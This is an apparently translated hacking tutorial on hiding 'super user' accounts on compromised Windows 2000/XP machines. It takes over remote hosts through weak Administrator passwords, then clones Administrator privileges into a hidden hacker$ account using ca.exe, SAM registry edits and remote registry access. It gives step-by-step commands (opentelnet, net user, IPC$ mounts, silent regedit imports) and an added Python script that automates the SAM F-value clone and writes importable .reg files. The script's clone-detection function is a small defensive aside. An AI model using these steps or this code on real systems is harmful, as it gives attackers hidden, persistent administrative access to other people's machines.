What do you want to do after a successful intrusion? Keep watching the machine and leave a backdoor? Backdoor Trojans are easily detected and removed; it is safer to create a hidden super user. After some study and practice, I have summarized the following ways of hiding a super user.
1. Create with the account cloning tool
Clone Administrator (CA.exe). This tool clones the built-in Administrator account into a specified ordinary account (the account must already exist). The cloned account ends up with the same settings as the built-in Administrator, and neither the NET command nor User Manager shows that its privileges have been raised. It makes a good rootkit.
Now let us see how to use the account cloning tool to create a hidden super user on a bot.
Suppose a scanner such as Fluxay or SuperScan has found a remote host whose Administrator password is 123. We can take control of the host with a GUI through DameWare Mini Remote Control (DMRC), or enable its Telnet service with OpenTelnet.exe. The command format is OpenTelnet.exe \\server username password NTLMAuthor telnetport, where NTLMAuthor sets the Telnet server's NTLM authentication mode and telnetport the listening port. For example: opentelnet \\192.XX.XX.2 Administrator "123" 0 99. Then run telnet 192.XX.XX.2 99 and enter the account and password to get a shell.
First, find out which users a careful administrator has disabled. Administrators usually disable Guest for security reasons, and sometimes other users as well. In the graphical interface this is easy to spot: in the account manager, a disabled account carries a red cross. From the command line you can only run net user username and read the "Account active" field. If you would rather not search, simply create a new account and disable it:
net user hacker$ youkou /add
net user hacker$ /active:no
Disconnect the Telnet session and use Xiaoyi's super-user cloning program ca.exe to clone the disabled user hacker$ into a super user: ca.exe \\192.XX.XX.2 Administrator 123 hacker$ youkou. Done!
hacker$ is now a super user with the same settings as Administrator (desktop, menu and so on). Still, verify the result with cca.exe: cca \\192.XX.XX.2 administrator 123. Look at the line it returns: "[hacker$] as same as [Administrator]" means the hacker$ account is identical to Administrator and the clone succeeded.
2. Create and hide a super user through the graphical interface
The graphical interface is the one we know best, and it works just as well for creating hidden super users on the local machine, on 3389 (Terminal Services) bots, or on bots controlled through DMRC.
Did you know that Windows 2000 has two registry editors, regedit.exe and regedt32.exe? In Windows XP they are one and the same program: to change a key's permissions, right-click it and choose Permissions. Regedt32.exe can set permissions on registry keys. By default even an Administrator cannot view the contents of the SAM key, so for Windows NT/2000/XP accounts grant Full Control on HKEY_LOCAL_MACHINE\SAM; after that you can read and write the information under the SAM key.
Create a new account hacker$ on the zombie, either in the account manager or with the command net user hacker$ 123 /add. Then open Run, type regedt32.exe and click OK. Expand HKEY_LOCAL_MACHINE\SAM, right-click the subkey and choose Permissions from the shortcut menu.
In the SAM Permissions dialog box, click Add and add the account you are logged on as to the "Group or user names" list. Here I am logged on as administrator, so I add administrator and tick Full Control in the permissions pane below.
Tip: add the account you are logged on as, or its group; do not modify the entries that are already there, or a series of unnecessary problems will follow. After the super user has been hidden, remove the entry you added here.
If the subkey still will not expand, close the editor and reopen it. On a Windows 2000 machine, close regedt32.exe and open regedit.exe instead (regedt32.exe can set permissions but cannot export .reg files; regedit.exe can). Expand HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names\hacker$. In the right-hand pane the default value is shown with type 0x3ee: that is the RID of hacker$, and it will differ from machine to machine (the built-in Administrator is always 0x1f4).
Next, export three keys: Users\Names\hacker$ as hacker.reg, the entry Users\000003EE that belongs to hacker$ as 3EE.reg, and Administrator's entry Users\000001F4 as 1F4.reg, then exit the Registry Editor. Open the exported files in Notepad. Copy the data of the value "F" under the super user's key 000001F4 over the data of the value "F" under hacker$'s key 000003EE, then merge the contents of 3EE.reg into hacker.reg. Now run net user hacker$ /del at the command line to delete the user hacker$, and import hacker.reg into the registry.
The hidden super user hacker$ now exists. Open regedt32.exe and restore the original permissions on HKEY_LOCAL_MACHINE\SAM (simply delete the administrator entry you added).
Note: once the hidden super user has been created, hacker$ appears neither in the account manager nor in the output of net user. But from now on you cannot change its password: if you change the password of hacker$ with net user, the hidden super user becomes visible in the account manager and can no longer be deleted.
3. Create a hidden super user from the command line
First use opentelnet.exe to enable the Telnet service on the remote host, telnet in to get a shell, and create a new account:
net user hacker$ youkou /add
Then export the registry key HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users:
regedit.exe /e hacker.reg HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\
Here /e is regedit's export switch and the key path, with its trailing backslash, must come last. As in method 2, the export only contains anything if the SAM key's permissions allow your account to read it.
Disconnect the Telnet session and open an IPC session: net use \\192.XX.XX.2\ipc$ "123" /user:"administrator". Download hacker.reg to the local machine: copy \\192.XX.XX.2\D$\hacker.reg, and open it in Notepad. Copy the data of the value "F" under the super user's key 000001F4 over the data of the value "F" under hacker$'s key 000003EE (the key that belongs to hacker$ differs from machine to machine; read its RID from the default value under Users\Names\hacker$). When done, upload the file: copy hacker.reg \\192.XX.XX.2\D$\hacker1.reg.
Telnet back into the remote host, run net user hacker$ /del to delete the hacker$ account, then import the edited file: regedit.exe /s hacker1.reg. The /s switch imports silently. A hidden super user has now been created.
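Methods 2 and 3 both come down to the same edit of the exported .reg text, and the cca.exe check in method 1 comes down to comparing F values. The Python script below is an added example; it is not part of the original article and is not the code of ca.exe or cca.exe. It parses a regedit export of HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users, reads each account's RID from the type of the default value under Users\Names\<name> (regedit writes it as @=hex(3ee):), copies Administrator's F value (RID 0x1F4) over the target account's F value, and lists every account whose F value already equals Administrator's. That last check is the one a defender can run over a SAM export to find cloned accounts. The export embedded in the script is constructed for the demonstration: the F and V data are short placeholders rather than real SAM contents, only the key layout and value types match what regedit produces.

```python
import re
import sys

REG_HEADER = "Windows Registry Editor Version 5.00"
USERS = r"HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users"
ADMIN_RID = 0x1F4  # the built-in Administrator is always RID 500

# Constructed sample export (not real SAM data): the F/V payloads are short
# placeholders; only the key layout and value types match a regedit export.
SAMPLE_EXPORT = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users]

[HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F4]
"F"=hex:02,00,01,00,00,00,00,00,f4,01,00,00,15,02,00,00,\
  00,00,00,00,00,00,00,00
"V"=hex:00,00,00,00,bc,00,00,00

[HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000003EE]
"F"=hex:02,00,01,00,00,00,00,00,ee,03,00,00,14,02,00,00,\
  00,00,00,00,00,00,00,00
"V"=hex:00,00,00,00,bc,00,00,00

[HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names]

[HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names\Administrator]
@=hex(1f4):

[HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names\hacker$]
@=hex(3ee):
"""


def parse_reg(text):
    """Parse .reg text into {key_path: {value_name: (type_code, data_bytes)}}."""
    lines = []  # regedit wraps long hex data: a line ending in "\" continues below
    for raw in text.splitlines():
        if lines and lines[-1].endswith("\\"):
            lines[-1] = lines[-1][:-1] + raw.strip()
        else:
            lines.append(raw.rstrip())
    keys, current = {}, None
    for line in lines:
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            keys[current] = {}
        elif current is not None and "=" in line:
            name, _, data = line.partition("=")
            m = re.fullmatch(r"hex(?:\(([0-9a-fA-F]+)\))?:(.*)", data)
            if m:  # only hex-style values occur under the SAM keys handled here
                vtype = int(m.group(1), 16) if m.group(1) else 3  # REG_BINARY == 3
                payload = bytes(int(b, 16) for b in m.group(2).split(",") if b)
                keys[current][name.strip('"')] = (vtype, payload)
    return keys


def user_key(rid):
    """regedit names each account's key by its RID as eight upper-case hex digits."""
    return r"%s\%08X" % (USERS, rid)


def name_to_rid(reg):
    """Under Users\\Names\\<name> the RID is stored as the *type* of the default value."""
    prefix = USERS + "\\Names\\"
    return {key[len(prefix):]: values["@"][0]
            for key, values in reg.items() if key.startswith(prefix) and "@" in values}


def clone_f(reg, target, source_rid=ADMIN_RID):
    """The edit made by hand in the article: give target the F value of source_rid."""
    out = {key: dict(values) for key, values in reg.items()}  # leave the input untouched
    out[user_key(name_to_rid(reg)[target])]["F"] = reg[user_key(source_rid)]["F"]
    return out


def find_clones(reg, source_rid=ADMIN_RID):
    """The comparison cca.exe reports: accounts whose F value equals Administrator's."""
    admin_f = reg[user_key(source_rid)]["F"][1]
    return sorted(name for name, rid in name_to_rid(reg).items() if rid != source_rid
                  and reg.get(user_key(rid), {}).get("F", (None, None))[1] == admin_f)


def dump_reg(reg):
    """Serialise back to .reg text that regedit /s can import."""
    lines = [REG_HEADER, ""]
    for key, values in reg.items():
        lines.append("[%s]" % key)
        for name, (vtype, data) in values.items():
            label = name if name == "@" else '"%s"' % name
            tag = "hex:" if vtype == 3 else "hex(%x):" % vtype
            lines.append("%s=%s%s" % (label, tag, ",".join("%02x" % b for b in data)))
        lines.append("")
    return "\n".join(lines)


if __name__ == "__main__":
    # usage: python sam_clone.py [export.reg [account [output.reg]]]; no args uses the sample
    if len(sys.argv) > 1:
        raw = open(sys.argv[1], "rb").read()  # 5.00 exports are UTF-16LE with BOM, REGEDIT4 is ANSI
        text = raw.decode("utf-16") if raw.startswith(b"\xff\xfe") else raw.decode("latin-1")
    else:
        text = SAMPLE_EXPORT
    reg = parse_reg(text)
    cloned = clone_f(reg, sys.argv[2] if len(sys.argv) > 2 else "hacker$")
    print("cloned accounts before edit:", find_clones(reg), file=sys.stderr)
    print("cloned accounts after edit: ", find_clones(cloned), file=sys.stderr)
    if len(sys.argv) > 1:
        with open(sys.argv[3] if len(sys.argv) > 3 else "hacker1.reg", "w",
                  encoding="utf-16", newline="\r\n") as f:
            f.write(dump_reg(cloned))
    else:
        print(dump_reg(cloned))
```

Run without arguments it works on the embedded sample and prints the edited export; with a real export it writes the result as a UTF-16 .reg file ready for regedit /s. For detection, run only find_clones over an export taken from a machine you administer: any name it returns, and any name under Users\Names that net user does not list, deserves a closer look.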
4. Create through the remote zombie's registry
Another simple and convenient way is to create the hidden super user with the Console (MMC) together with the Registry Editor's File > Connect Network Registry function.
Click Start > Run, type mmc and press Enter to open the console. In the File menu choose Add/Remove Snap-in (shortcut Ctrl+M); in the dialog that appears click Add and choose Local Users and Groups from the list in the Add Standalone Snap-in dialog.
Click Add to bring up the Choose Target Machine dialog, select Another computer, enter the IP address of the remote computer and click Finish.
Back in the console window we can now manage the remote computer's users and groups: right-click in the empty right-hand pane and choose New User from the shortcut menu to create the account hacker$.
Then edit the remote registry: connect to it from the Registry Editor, export the relevant keys and edit them as described above.
Delete the newly created hacker$ account in the console and close it. Then use File > Import in the Registry Editor to import the file exported and edited above.
If the Remote Registry service is not running on the remote host, start it yourself; you have had the Administrator account and password from the start.
5. Notes
1. Once a hidden super user has been created it is invisible both in the account manager and at the command line, but the account still exists. (The $ suffix alone keeps a name out of net user's listing; it is the registry trick that keeps it out of the account manager.)
2. Do not change the hidden super user's password after creating it: doing so exposes it in the account manager, where it then cannot be deleted.
3. When creating a hidden super user on your own machine, back up the registry first with the built-in backup tool.
Want to try your hand? Test it on your own computer!